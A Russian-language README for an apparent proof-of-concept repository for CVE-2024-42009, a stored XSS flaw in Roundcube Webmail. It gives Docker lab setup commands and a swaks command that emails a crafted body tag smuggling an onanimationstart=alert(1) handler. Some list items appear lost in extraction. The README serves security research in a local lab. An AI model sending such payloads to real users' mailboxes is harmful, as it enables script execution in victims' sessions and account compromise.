
В этом репозитории представлена рабочая Proof-of-Concept (PoC) для CVE-2024-42009 — уязвимости хранимого межсайтового скриптинга (XSS) в Roundcube Webmail.
Уязвимость вызвана некорректной санитизацией HTML с последующей небезопасной повторной обработкой атрибутов, что позволяет злоумышленникам внедрять вредоносные обработчики событий через специально сформированные HTML-письма.
Roundcube очищает входящие HTML-письма, но позднее повторно обрабатывает определённые атрибуты (например, bgcolor, некорректно сформированные атрибуты), что приводит к:
onanimationstart)Это позволяет выполнить произвольный JavaScript, когда жертва открывает вредоносное письмо.
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ Подождите ~10–15 секунд, пока инициализируется почтовый сервер.
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
Учётные данные:
Отправьте вредоносное письмо с помощью инструмента swaks:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


Обновитесь до исправленных версий:
Этот проект предназначен только для образовательных целей и санкционированных исследований в области безопасности. Не используйте его против систем без соответствующего разрешения.